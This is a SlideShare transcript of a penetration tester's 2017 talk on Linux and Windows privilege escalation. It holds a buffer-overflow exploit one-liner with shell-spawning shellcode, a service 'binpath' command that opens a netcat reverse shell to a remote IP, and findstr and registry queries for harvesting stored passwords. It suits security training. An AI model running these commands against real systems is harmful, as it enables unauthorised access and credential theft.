SlideShare a Scribd company logo

How fun of privilege escalation Red Pill2017

Ammarit Thongthua ,CISSP CISM GXPN CSSLP CCNP, profile picture
Ammarit Thongthua ,CISSP CISM GXPN CSSLP CCNP

This document discusses various methods for escalating privileges on Windows and Linux systems. It begins by covering remote exploitation of vulnerable services running with high privileges. It then covers other methods such as exploiting weak passwords, insecure file/registry permissions, misconfigured services, and kernel exploits. Specific examples discussed include exploiting sudo permissions, cron jobs, service binary path manipulation, and the DirtyCOW Linux privilege escalation.

Education
1 of 123
Downloaded 240 times
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
How Fun of Privilege Escalation Ammarit Thongthua, CISSP CISM GXPN Risk Advisory Manager, Deloitte Thailand
# whoami <Name> Ammarit Thongthua Khay Shellcodenoobx </Name> <Job> Risk Advisory Manager, Deloitte Thailand Penetration Tester Security Consultant </Job> <Education> B.Eng Com, ABAC M.Sci Cyber Security and Info Assurance, Mahidol Unv. CISSP, CISM, CSSLP, GXPN, CCNP, CEH, Security+ </Education>
Pre Exploitation Exploitation Post Exploitation # “Privilege Escalation” Information gathering Scanning Enumeration Remote Exploitation - Gain system access - Gain information - Denial of services - Privilege Escalation Local Exploitation - Bypass Restriction - Privilege Escalation Gathering Sensitive Info Manage System/Service Pivoting Windows
# “Privilege Escalation” NT AUTHORITYSystem Administrators Power Users Users Root Sudoer UsersService Users Service Users Windows Unix
# “Privilege Escalation” • Vertical privilege escalation -> Gain higher privilege • Horizontal privilege escalation -> Gain access with other accounts Users Service Users john Apache, mysql Users john Root
# “Privilege Escalation” NT AUTHORITYSystem Administrators Power Users Users UsersService Users Windows Anonymous FTP Webshell LocalExploit Vul. Service Exp
# “Privilege Escalation” NT AUTHORITYSystem Administrators Power Users UsersService Users Windows Unauthorized Access LocalExploit Users
# “Privilege Escalation” NT AUTHORITYSystem Administrators Power Users UsersService Users Windows Unauthorized Access LocalExploit Users
# Remote and Local Exploitation Network TCP/UDP TCP: 20/21 TCP: 22 TCP: 23 TCP: 25 UDP: 53 TCP: 80 UDP: 161 TCP: 443 TCP: 445 TCP/UDP : 514 TCP: 1433 TCP: 1521 TCP: 3306 TCP: 3389 TCP: XXXX • Remote Exploitation
# Remote and Local Exploitation Race Condition Buffer Overflow Heap Overflow Kernel Exploit Evasion DLL Injection DLL Hijacking Hot Potato Mis-config Service, file permission
# Remote and Local Exploitation Root
# “Privilege Escalation” • Access to restricted resources/file • System Credential • /etc/shadow • SAM file • Registry • Configuration files • Encryption Key • System memory • Run privilege commands , set system configuration and Installations • Pivoting • Maintain access , Backdoor • Key logger, Rootkit, Dump traffic • Many more..
# “Privilege Escalation”
# “Privilege Escalation”
# “Privilege Escalation”
# “Privilege Escalation” Ways for Linux • Remote Exploit to vulnerable service running by high privilege users • Weak password of high privilege users • Credential store in file with weak permission • Configurations, Logs files • History • Env , $PATH • Shell Escape(restrict shell ,chroot) • Vulnerable Applications / Programs / Services use high privilege users • Weak permission file of Jobs/Task run by high privilege users • Sudoer • System Misconfiguration • Kernel Exploitation • Remote Exploitation by local host
# “Privilege Escalation” Ways for Linux • Remote Exploit to vulnerable service running by high privilege users
# “Privilege Escalation” Ways for Linux • Remote Exploit to vulnerable service running by high privilege users FILE_SERVER #ps –ef | grep root root 1644 0.0 0.6 4504 1676 ? S 19:34 0:00 smbd -D
# “Privilege Escalation” Ways for Linux • Weak password of high privilege users Maybe use the password similar to username Maybe use weak password root Password P@ssw0rd ….
# “Privilege Escalation” Ways for Linux • Credential store in file with weak permission • Configurations, Logs files • History • Env , $PATH
# “Privilege Escalation” Ways for Linux • Restricted Shell Escape https://netsec.ws/?p=337
# “Privilege Escalation” Ways for Linux • Restricted Shell Escape https://netsec.ws/?p=337https://0feci.wordpress.com/tag/escaping-restricted-shell-bypass/
# “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users • Characteristic of vulnerable program • Has permission “root” as user or group • Has set SUID, GUID • Can perform Overflow • Use Static Libc. (Nice to have)
# “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users • Characteristic of vulnerable program • Has permission “root” as user or group • Has set SUID, GUID list="$(find / -perm -4000 -o -perm -2000)";for i in $list; do ls -al $i; done ls –R / | grep “wsr” | grep “root”
# “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users
# “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users • Characteristic of vulnerable program • Can perform Overflow
# “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users Check buffer overflow position
# “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users Check buffer overflow position
#objdump –d vul_app | grep “jmp” | grep “esp” # ROPgadget --binary vul_app --only "jmp“ | grep esp 0x08049f0f : jmp %esp # “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users
# “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users Shellcode system(“/bin//sh”) Shellcode= “x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90 x31xC0x50x68x2Fx2Fx73x68x68x2Fx62x69x6Ex89xE3x50x53x89xE1xB0x0BxCDx80” jmp %esp 0x08049f0f esp
#python –c ‘ “A”*612 + “x0fx49x04x08” + “x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90 x31xC0x50x68x2Fx2Fx73x68x68x2Fx62x69x6Ex89xE3x50x53x89xE1xB0x0BxCDx80”’ | ./vul_app # “Privilege Escalation” Ways for Linux Privilege is dropped
# “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users #nano /tmp/sh.c
# “Privilege Escalation” Ways for Linux #python –c ‘ “A”*612 + “x0fx49x04x08” + “x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90 x31xC0x50x68x2Fx2Fx73x68x68x2Fx74x6dx70x89xE3x50x53x89xE1xB0x0BxCDx80”’ | ./vul_app tmp • Vulnerable Applications / Programs / Services use high privilege users
# “Privilege Escalation” Ways for Linux
# “Privilege Escalation” Ways for Linux The real life is not easy !!!! • Canary (Buffer overflow detection) • Executable Stack Prevention (NX , DEP) • Address Space Layout Randomization (ASLR)
# “Privilege Escalation” Ways for Linux But It’s possible to bypass !!! • Canary (Buffer overflow detection) -> Canary Repair • Executable Stack Prevention (NX , DEP) -> Ret-2-Libc , ROP • Address Space Layout Randomization (ASLR) -> Static Lib, App Warp Up https://www.slideshare.net/ammarit/unix-executable-buffer-overflow?qid=3ae3efd0-d1b4-4f3c-b85c- 82b1d063aa6b&v=&b=&from_search=1
# “Privilege Escalation” Ways for Linux • Weak permission file of Jobs/Task run by high privilege users /etc/cron.d /etc/crontab /etc/cron.hourly /etc/cron.daily /etc/cron.weekly /etc/cron.monthly # ls -Ral /etc/cron*
# “Privilege Escalation” Ways for Linux • Weak permission file of Jobs/Task run by high privilege users Reverse shell
# “Privilege Escalation” Ways for Linux • Weak permission file of Jobs/Task run by high privilege users
# “Privilege Escalation” Ways for Linux
# “Privilege Escalation” Ways for Linux • Weak permission file of Jobs/Task run by high privilege users
# “Privilege Escalation” Ways for Linux • Sudoer (Compromised user we got maybe in the sudoer list)
# “Privilege Escalation” Ways for Linux • System Misconfiguration
# “Privilege Escalation” Ways for Linux • Kernel Exploitation Ex: DirtyCOW
# “Privilege Escalation” Ways for Linux • Kernel Exploitation (Trick) Ex: Linux version 2.6.9-89.EL • Compile exploit on the target system on target like environment • Metasploitable is good exploit compile environment
# “Privilege Escalation” Ways for Linux #ps –ef | grep root root 1644 0.0 0.6 4504 1676 ? S 19:34 0:00 smbd -D • Remote Exploitation by local host 127.0.0.1
# “Privilege Escalation” Ways for Linux • [Linux Privilege Escalation Scripts and Commands] Ref : https://netsec.ws/?p=309 LinEnum http://www.rebootuser.com/?p=1758 LinuxPrivChecker http://www.securitysift.com/download/linuxprivchecker.py Basic-linux-privilege-escalation https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation
• LinuxPrivChecker # “Privilege Escalation” Ways for Linux
• LinuxPrivChecker # “Privilege Escalation” Ways for Linux
# “Privilege Escalation” Ways for Linux • Case Study :
# “Privilege Escalation” Ways for Linux • Case Study :
# “Privilege Escalation” Ways for Linux • Case Study : But no exploit detail in exploit-db !!!
# “Privilege Escalation” Ways for Linux • Case Study :
# “Privilege Escalation” Ways for Linux • Case Study :
Low Priv Other Unix Servers Dirty Cow Default password Crack root pass root Bypass Restrict Shell CMC # “Privilege Escalation” Ways for Linux • Case Study :
# “Privilege Escalation” Ways for Windows • Remote Exploit to vulnerable service running by high privilege users • Weak password of high privilege users • Credential store in file and Registry • Vulnerable Applications / Programs / Services use high privilege users • Weak permission file of Jobs/Task run by high privilege users • System Misconfiguration • Kernel Exploitation • Pass-the-hash • DLL Injection • DLL Hijacking • Remote Exploitation by local host • Hotpotato • Many more…
# Remote Exploit to escalate privilege • Exploit to vulnerable service running with high privilege users
# Remote Exploit to escalate privilege • Exploit to vulnerable service running with high privilege users Credit : Worawit Wangwarunyoo (sleepya)
• Exploit to vulnerability of the service misconfigure running with high privilege users # “Privilege Escalation” Ways for Windows
• Exploit to vulnerability of the service misconfigure running with high privilege users # “Privilege Escalation” Ways for Windows
# Remote Exploit to escalate privilege • Exploit to vulnerability of the service misconfigure running with high privilege users WebShell
# “Privilege Escalation” Ways for Windows • Reverse Meterpreter “getsystem” command
# “Privilege Escalation” Ways for Windows • Reverse Meterpreter “getsystem” command “It’s not always easy in the real life”
• PS Migration # “Privilege Escalation” Ways for Windows
• PS Migration # “Privilege Escalation” Ways for Windows
• PS Migration # “Privilege Escalation” Ways for Windows
# Remote Exploit to escalate privilege • Credential store in files findstr /si password *.txt findstr /si password *.xml findstr /si password *.ini Pass PASS PWD
c:sysprep.inf c:sysprepsysprep.xml c:unattend.xml %WINDIR%PantherUnattendUnattended.xml %WINDIR%PantherUnattended.xml dir c:*vnc.ini /s /b dir c:*ultravnc.ini /s /b dir c: /s /b | findstr /si *vnc.ini # Remote Exploit to escalate privilege • Credential store in files
# Remote Exploit to escalate privilege https://adsecurity.org/?p=2288 (<DOMAIN>SYSVOL<DOMAIN>Policies)• Credential store in DC Policy Script files
# Remote Exploit to escalate privilege • Credential store in registry # VNC reg query "HKCUSoftwareORLWinVNC3Password" # Windows autologin reg query "HKLMSOFTWAREMicrosoftWindows NTCurrentversionWinlogon" # SNMP Paramters reg query "HKLMSYSTEMCurrentControlSetServicesSNMP" # Putty reg query "HKCUSoftwareSimonTathamPuTTYSessions" # Search for password in registry reg query HKLM /f password /t REG_SZ /s reg query HKCU /f password /t REG_SZ /s
# Remote Exploit to escalate privilege • Credential store in registry
# Remote Exploit to escalate privilege
# Remote Exploit to escalate privilege http://www.labofapenetrationtester.com/2015/05/ dumping-passwords-in-plain-on-windows-8-1.html Windows Server 2012
# Remote Exploit to escalate privilege
# Remote Exploit to escalate privilege • Token Impersonation https://www.offensive-security.com/metasploit-unleashed/fun-incognito/
• Insecure Services permission # “Privilege Escalation” Ways for Windows
• Insecure Services permission -> Modify binpath # “Privilege Escalation” Ways for Windows https://technet.microsoft.com/en-us/sysinternals/accesschk.aspx
• Insecure Services permission -> Modify binpath # “Privilege Escalation” Ways for Windows https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
• Insecure Services permission -> Modify binpath (Example) # “Privilege Escalation” Ways for Windows
• Insecure Services permission -> Modify binpath (Example) # “Privilege Escalation” Ways for Windows sc config upnphost binpath= "C:Inetpubnc.exe -nv 10.11.0.110 5555 -e C:WINDOWSSystem32cmd.exe"
• Insecure Services permission by msf # “Privilege Escalation” Ways for Windows
# “Privilege Escalation” Ways for Windows
# “Privilege Escalation” Ways for Windows Ref:https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/ • Unquoted Service Paths When Windows attempts to run this service, it will look at the following paths in order and will run the first EXE that it will find:
# “Privilege Escalation” Ways for Windows Ref:https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/ • Unquoted Service Paths
# “Privilege Escalation” Ways for Windows • Unquoted Service Paths
# “Privilege Escalation” Ways for Windows • Unquoted Service Paths
# “Privilege Escalation” Ways for Windows
# “Privilege Escalation” Ways for Windows
# “Privilege Escalation” Ways for Windows • Unquote path + MS15-067
# “Privilege Escalation” Ways for Windows • Unquote path + MS15-067
# “Privilege Escalation” Ways for Windows GGEZ • Unquote path + MS15-067
• DLL Hijacking # “Privilege Escalation” Ways for Windows https://msitpros.com/?p=2012 The way that Windows loads DLLs then, is to search the following directories in this order: – The directory from which the application loaded – C:WindowsSystem32 – C:WindowsSystem – C:Windows – The current working directory – Directories in the system PATH environment variable – Directories in the user PATH environment variable https://www.gracefulsecurity.com/privesc-dll-hijacking/
• DLL Hijacking # “Privilege Escalation” Ways for Windows https://pentestlab.blog/2017/03/27/dll-hijacking/
# “Privilege Escalation” Ways for Windows • DLL Hijacking https://pentestlab.blog/2017/03/27/dll-hijacking/
https://pentestlab.blog/2017/03/27/dll-hijacking/ # “Privilege Escalation” Ways for Windows
https://pentestlab.blog/2017/03/27/dll-hijacking/ # “Privilege Escalation” Ways for Windows • DLL Hijacking
# “Privilege Escalation” Ways for Windows • Driver Exploitation
https://www.exploit-db.com/exploits/42665/ Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow Privilege Escalation• Driver Exploitation Example : # “Privilege Escalation” Ways for Windows
• HOT Potato # “Privilege Escalation” Ways for Windows
• HOT Potato # “Privilege Escalation” Ways for Windows Manual add user Use Hot Potato technique
# “Privilege Escalation” Ways for Windows • Pass-th-Hash
• Remote Exploit on the localhost # “Privilege Escalation” Ways for Windows
# “Privilege Escalation” Ways for Windows • Local exploit with Metasploit
# “Privilege Escalation” Ways for Windows • Local exploit with Metasploit
• Local Exploit to escalate privilege # “Privilege Escalation” Ways for Windows
# “Privilege Escalation” Ways for Windows
# “Privilege Escalation” Ways for Windows • Local Exploit to escalate privilege
# “Privilege Escalation” Ways for Windows
dpkg --add-architecture i386 && apt-get update && apt-get install wine32 pip install pyinstaller # “Privilege Escalation” Ways for Windows
# “Privilege Escalation” Ways for Windows DEMO Noobx_shell
# “Privilege Escalation” Ways for Windows
# “Privilege Escalation” Ways for Windows
# “Privilege Escalation” Ways for Windows • Case Study 2 # MS17-010 DC1 Servers Client PC Unpatch
# “Privilege Escalation” Ways for Windows • Case Study 2 # MS17-010
# “Privilege Escalation” Ways for Windows • Case Study 2 # MS17-010
# “Privilege Escalation” Ways for Windows • Case Study 2 # MS17-010 DC1 Servers Client PC Unpatch
# “Privilege Escalation” on other devices • Mobile Phone • Root or Jailbreak • DirtyCow • Network Device • Remote Exploit • EXTRABACON exploit • Backdooring • ROM0 • Password Crack of high privilege level account
# “Privilege Escalation” on other devices
# Prevention • Secure by design • System hardening • Disable unused service • Disable/remove unused programs , users or backup files • Installed endpoint security • Strong Access Control and Authentication • Least Privilege • Patch Management • Security Assessment • Vulnerability Assessment • Penetration Testing
Q & A
How fun of privilege escalation Red Pill2017
Thank You Ammarit Thongthua, CISSP CISM GXPN Risk Advisory Manager, Deloitte Thailand
• http://www.fuzzysecurity.com/tutorials/16.html • https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html • https://github.com/rmusser01/Infosec_Reference/blob/master/Draft/Privilege%20Escalation%20%26%20Post- Exploitation.md • http://www.hackingarticles.in/7-ways-get-admin-access-remote-windows-pc-bypass-privilege-escalation/ • https://pentestlab.blog/2017/04/04/dll-injection # References

More Related Content

PDF
Level Up! - Practical Windows Privilege Escalation
jakx_
 
PDF
Hunting for Privilege Escalation in Windows Environment
Teymur Kheirkhabarov
 
PDF
CNIT 126: 10: Kernel Debugging with WinDbg
Sam Bowne
 
PPTX
Malware Static Analysis
Hossein Yavari
 
PPTX
Practical Malware Analysis: Ch 2 Malware Analysis in Virtual Machines & 3: Ba...
Sam Bowne
 
PDF
PHDays 2018 Threat Hunting Hands-On Lab
Teymur Kheirkhabarov
 
PPTX
PSConfEU - Offensive Active Directory (With PowerShell!)
Will Schroeder
 
PDF
CNIT 152: 1 Real-World Incidents
Sam Bowne
 
Level Up! - Practical Windows Privilege Escalation
jakx_
 
Hunting for Privilege Escalation in Windows Environment
Teymur Kheirkhabarov
 
CNIT 126: 10: Kernel Debugging with WinDbg
Sam Bowne
 
Malware Static Analysis
Hossein Yavari
 
Practical Malware Analysis: Ch 2 Malware Analysis in Virtual Machines & 3: Ba...
Sam Bowne
 
PHDays 2018 Threat Hunting Hands-On Lab
Teymur Kheirkhabarov
 
PSConfEU - Offensive Active Directory (With PowerShell!)
Will Schroeder
 
CNIT 152: 1 Real-World Incidents
Sam Bowne
 

What's hot (20)

PDF
CNIT 152: 3 Pre-Incident Preparation
Sam Bowne
 
PDF
CNIT 126 11. Malware Behavior
Sam Bowne
 
PPTX
Ethical Hacking n VAPT presentation by Suvrat jain
Suvrat Jain
 
PPTX
Kheirkhabarov24052017_phdays7
Teymur Kheirkhabarov
 
PDF
Hunting for Credentials Dumping in Windows Environment
Teymur Kheirkhabarov
 
PDF
6 Scope & 7 Live Data Collection
Sam Bowne
 
PPT
Secure code practices
Hina Rawal
 
PDF
Penetration testing & Ethical Hacking
S.E. CTS CERT-GOV-MD
 
PPTX
2017 Secure360 - Hacking SQL Server on Scale with PowerShell
Scott Sutherland
 
PPTX
Introduction to Malware Analysis
Andrew McNicol
 
PDF
CNIT 126 6: Recognizing C Code Constructs in Assembly
Sam Bowne
 
PDF
Bypass_AV-EDR.pdf
Farouk2nd
 
PDF
aclpwn - Active Directory ACL exploitation with BloodHound
DirkjanMollema
 
PPTX
Linux privilege escalation
SongchaiDuangpan
 
PPTX
NETWORK PENETRATION TESTING
Er Vivek Rana
 
PDF
Nessus Software
Megha Sahu
 
PPTX
Deep dive into ssrf
n|u - The Open Security Community
 
PPTX
Catch Me If You Can: PowerShell Red vs Blue
Will Schroeder
 
PDF
CNIT 126 2: Malware Analysis in Virtual Machines & 3: Basic Dynamic Analysis
Sam Bowne
 
PPTX
mimikatz @ phdays
Benjamin Delpy
 
CNIT 152: 3 Pre-Incident Preparation
Sam Bowne
 
CNIT 126 11. Malware Behavior
Sam Bowne
 
Ethical Hacking n VAPT presentation by Suvrat jain
Suvrat Jain
 
Kheirkhabarov24052017_phdays7
Teymur Kheirkhabarov
 
Hunting for Credentials Dumping in Windows Environment
Teymur Kheirkhabarov
 
6 Scope & 7 Live Data Collection
Sam Bowne
 
Secure code practices
Hina Rawal
 
Penetration testing & Ethical Hacking
S.E. CTS CERT-GOV-MD
 
2017 Secure360 - Hacking SQL Server on Scale with PowerShell
Scott Sutherland
 
Introduction to Malware Analysis
Andrew McNicol
 
CNIT 126 6: Recognizing C Code Constructs in Assembly
Sam Bowne
 
Bypass_AV-EDR.pdf
Farouk2nd
 
aclpwn - Active Directory ACL exploitation with BloodHound
DirkjanMollema
 
Linux privilege escalation
SongchaiDuangpan
 
NETWORK PENETRATION TESTING
Er Vivek Rana
 
Nessus Software
Megha Sahu
 
Deep dive into ssrf
n|u - The Open Security Community
 
Catch Me If You Can: PowerShell Red vs Blue
Will Schroeder
 
CNIT 126 2: Malware Analysis in Virtual Machines & 3: Basic Dynamic Analysis
Sam Bowne
 
mimikatz @ phdays
Benjamin Delpy
 
Ad

Similar to How fun of privilege escalation Red Pill2017 (20)

PPTX
Privilege Escalation in Ethical Hacking.pptx
Guna Dhondwad
 
PDF
1000 to 0
Sunny Neo
 
PPTX
Linux privilege escalation 101
Rashid feroz
 
PDF
Privilege escalation from 1 to 0 Workshop
Hossam .M Hamed
 
PDF
Check Your Privilege (Escalation)
Bishop Fox
 
PDF
Introduction to Linux Privilege Escalation Methods
Bishop Fox
 
PPTX
Linx privx privileges-sudo misconfiguration group and docker daemon privileges
AliBawazeEer
 
PPTX
Fundamentals of Linux Privilege Escalation
nullthreat
 
PDF
Aide 2014 - Fundamentals of Linux Privilege Escalation
nullthreat
 
PPTX
Unquoted service path exploitation
Dhruv Sharma
 
PPTX
Linux remote
yarden hanan
 
PPTX
Windows privilege escalation
Dhruv Shah
 
PPTX
Windows privilege escalation by Dhruv Shah
OWASP Delhi
 
PDF
Linux Privilege Escalation with Lin Security.
Deepanshu Gajbhiye
 
PDF
Methods for Privilege Escalation Part One.pdf
rimaNova1
 
PDF
40 Methods for Privilege Escalation Part 1
Hadess
 
PDF
Privilege Escalation Techniques and methodology.pdf
harshvikramshahi2
 
PPTX
Windows Privilege Escalation Techniques.pptx
pentest716
 
PPTX
Windows Client Privilege Escalation-Shared.pptx
Oddvar Moe
 
PPTX
Exploitation techniques and fuzzing
Prachi Gulihar
 
Privilege Escalation in Ethical Hacking.pptx
Guna Dhondwad
 
1000 to 0
Sunny Neo
 
Linux privilege escalation 101
Rashid feroz
 
Privilege escalation from 1 to 0 Workshop
Hossam .M Hamed
 
Check Your Privilege (Escalation)
Bishop Fox
 
Introduction to Linux Privilege Escalation Methods
Bishop Fox
 
Linx privx privileges-sudo misconfiguration group and docker daemon privileges
AliBawazeEer
 
Fundamentals of Linux Privilege Escalation
nullthreat
 
Aide 2014 - Fundamentals of Linux Privilege Escalation
nullthreat
 
Unquoted service path exploitation
Dhruv Sharma
 
Linux remote
yarden hanan
 
Windows privilege escalation
Dhruv Shah
 
Windows privilege escalation by Dhruv Shah
OWASP Delhi
 
Linux Privilege Escalation with Lin Security.
Deepanshu Gajbhiye
 
Methods for Privilege Escalation Part One.pdf
rimaNova1
 
40 Methods for Privilege Escalation Part 1
Hadess
 
Privilege Escalation Techniques and methodology.pdf
harshvikramshahi2
 
Windows Privilege Escalation Techniques.pptx
pentest716
 
Windows Client Privilege Escalation-Shared.pptx
Oddvar Moe
 
Exploitation techniques and fuzzing
Prachi Gulihar
 
Ad

Recently uploaded (20)

PDF
RMMM.pdf make it easy to upload and study
sajedul2
 
PDF
BÀI TẬP BỔ TRỢ 4 KỸ NĂNG TIẾNG ANH 9 GLOBAL SUCCESS - CẢ NĂM - BÁM SÁT FORM Đ...
Nguyen Thanh Tu Collection
 
PPTX
BOWEL ELIMINATION FACTORS AFFECTING AND TYPES
PreetiSawant10
 
PPTX
Week 4 Term 3 Study Techniques revisited.pptx
mansk2
 
PDF
Complications of Minimal Access Surgery at WLH
mohitsuren827
 
PPTX
Cell Structure & Organelles in detailed.
DHANASHREESIVAKUMAR
 
PPTX
IMMUNITY IMMUNITY refers to protection against infection, and the immune syst...
shilpa939953
 
PPTX
Introduction_to_Human_Anatomy_and_Physiology_for_B.Pharm.pptx
chetansingh379583
 
PPTX
Renaissance Architecture: A Journey from Faith to Humanism
DrMonicaSharma
 
PDF
102 student loan defaulters named and shamed – Is someone you know on the list?
Kweku Zurek
 
PDF
Classroom Observation Tools for Teachers
Nicaramirez
 
PPTX
Introduction to Child Health Nursing – Unit I | Child Health Nursing I | B.Sc...
RAKESH SAJJAN
 
PPTX
Microbial diseases, their pathogenesis and prophylaxis
DevlinaSengupta
 
PDF
Saundersa Comprehensive Review for the NCLEX-RN Examination.pdf
sreejithcareers
 
PDF
Module 4: Burden of Disease Tutorial Slides S2 2025
Jonathan Hallett
 
PPTX
The Healthy Child – Unit II | Child Health Nursing I | B.Sc Nursing 5th Semester
RAKESH SAJJAN
 
PDF
2.FourierTransform-ShortQuestionswithAnswers.pdf
Raji Murugan
 
PDF
The Lost Whites of Pakistan by Jahanzaib Mughal.pdf
jahanzaibmughal6
 
PDF
Microbial disease of the cardiovascular and lymphatic systems
KeyaSharma
 
PDF
01-Introduction-to-Information-Management.pdf
PrinceIbarra
 
RMMM.pdf make it easy to upload and study
sajedul2
 
BÀI TẬP BỔ TRỢ 4 KỸ NĂNG TIẾNG ANH 9 GLOBAL SUCCESS - CẢ NĂM - BÁM SÁT FORM Đ...
Nguyen Thanh Tu Collection
 
BOWEL ELIMINATION FACTORS AFFECTING AND TYPES
PreetiSawant10
 
Week 4 Term 3 Study Techniques revisited.pptx
mansk2
 
Complications of Minimal Access Surgery at WLH
mohitsuren827
 
Cell Structure & Organelles in detailed.
DHANASHREESIVAKUMAR
 
IMMUNITY IMMUNITY refers to protection against infection, and the immune syst...
shilpa939953
 
Introduction_to_Human_Anatomy_and_Physiology_for_B.Pharm.pptx
chetansingh379583
 
Renaissance Architecture: A Journey from Faith to Humanism
DrMonicaSharma
 
102 student loan defaulters named and shamed – Is someone you know on the list?
Kweku Zurek
 
Classroom Observation Tools for Teachers
Nicaramirez
 
Introduction to Child Health Nursing – Unit I | Child Health Nursing I | B.Sc...
RAKESH SAJJAN
 
Microbial diseases, their pathogenesis and prophylaxis
DevlinaSengupta
 
Saundersa Comprehensive Review for the NCLEX-RN Examination.pdf
sreejithcareers
 
Module 4: Burden of Disease Tutorial Slides S2 2025
Jonathan Hallett
 
The Healthy Child – Unit II | Child Health Nursing I | B.Sc Nursing 5th Semester
RAKESH SAJJAN
 
2.FourierTransform-ShortQuestionswithAnswers.pdf
Raji Murugan
 
The Lost Whites of Pakistan by Jahanzaib Mughal.pdf
jahanzaibmughal6
 
Microbial disease of the cardiovascular and lymphatic systems
KeyaSharma
 
01-Introduction-to-Information-Management.pdf
PrinceIbarra
 

How fun of privilege escalation Red Pill2017

  • 1. How Fun of Privilege Escalation Ammarit Thongthua, CISSP CISM GXPN Risk Advisory Manager, Deloitte Thailand
  • 2. # whoami <Name> Ammarit Thongthua Khay Shellcodenoobx </Name> <Job> Risk Advisory Manager, Deloitte Thailand Penetration Tester Security Consultant </Job> <Education> B.Eng Com, ABAC M.Sci Cyber Security and Info Assurance, Mahidol Unv. CISSP, CISM, CSSLP, GXPN, CCNP, CEH, Security+ </Education>
  • 3. Pre Exploitation Exploitation Post Exploitation # “Privilege Escalation” Information gathering Scanning Enumeration Remote Exploitation - Gain system access - Gain information - Denial of services - Privilege Escalation Local Exploitation - Bypass Restriction - Privilege Escalation Gathering Sensitive Info Manage System/Service Pivoting Windows
  • 4. # “Privilege Escalation” NT AUTHORITYSystem Administrators Power Users Users Root Sudoer UsersService Users Service Users Windows Unix
  • 5. # “Privilege Escalation” • Vertical privilege escalation -> Gain higher privilege • Horizontal privilege escalation -> Gain access with other accounts Users Service Users john Apache, mysql Users john Root
  • 6. # “Privilege Escalation” NT AUTHORITYSystem Administrators Power Users Users UsersService Users Windows Anonymous FTP Webshell LocalExploit Vul. Service Exp
  • 7. # “Privilege Escalation” NT AUTHORITYSystem Administrators Power Users UsersService Users Windows Unauthorized Access LocalExploit Users
  • 8. # “Privilege Escalation” NT AUTHORITYSystem Administrators Power Users UsersService Users Windows Unauthorized Access LocalExploit Users
  • 9. # Remote and Local Exploitation Network TCP/UDP TCP: 20/21 TCP: 22 TCP: 23 TCP: 25 UDP: 53 TCP: 80 UDP: 161 TCP: 443 TCP: 445 TCP/UDP : 514 TCP: 1433 TCP: 1521 TCP: 3306 TCP: 3389 TCP: XXXX • Remote Exploitation
  • 10. # Remote and Local Exploitation Race Condition Buffer Overflow Heap Overflow Kernel Exploit Evasion DLL Injection DLL Hijacking Hot Potato Mis-config Service, file permission
  • 11. # Remote and Local Exploitation Root
  • 12. # “Privilege Escalation” • Access to restricted resources/file • System Credential • /etc/shadow • SAM file • Registry • Configuration files • Encryption Key • System memory • Run privilege commands , set system configuration and Installations • Pivoting • Maintain access , Backdoor • Key logger, Rootkit, Dump traffic • Many more..
  • 16. # “Privilege Escalation” Ways for Linux • Remote Exploit to vulnerable service running by high privilege users • Weak password of high privilege users • Credential store in file with weak permission • Configurations, Logs files • History • Env , $PATH • Shell Escape(restrict shell ,chroot) • Vulnerable Applications / Programs / Services use high privilege users • Weak permission file of Jobs/Task run by high privilege users • Sudoer • System Misconfiguration • Kernel Exploitation • Remote Exploitation by local host
  • 17. # “Privilege Escalation” Ways for Linux • Remote Exploit to vulnerable service running by high privilege users
  • 18. # “Privilege Escalation” Ways for Linux • Remote Exploit to vulnerable service running by high privilege users FILE_SERVER #ps –ef | grep root root 1644 0.0 0.6 4504 1676 ? S 19:34 0:00 smbd -D
  • 19. # “Privilege Escalation” Ways for Linux • Weak password of high privilege users Maybe use the password similar to username Maybe use weak password root Password P@ssw0rd ….
  • 20. # “Privilege Escalation” Ways for Linux • Credential store in file with weak permission • Configurations, Logs files • History • Env , $PATH
  • 21. # “Privilege Escalation” Ways for Linux • Restricted Shell Escape https://netsec.ws/?p=337
  • 22. # “Privilege Escalation” Ways for Linux • Restricted Shell Escape https://netsec.ws/?p=337https://0feci.wordpress.com/tag/escaping-restricted-shell-bypass/
  • 23. # “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users • Characteristic of vulnerable program • Has permission “root” as user or group • Has set SUID, GUID • Can perform Overflow • Use Static Libc. (Nice to have)
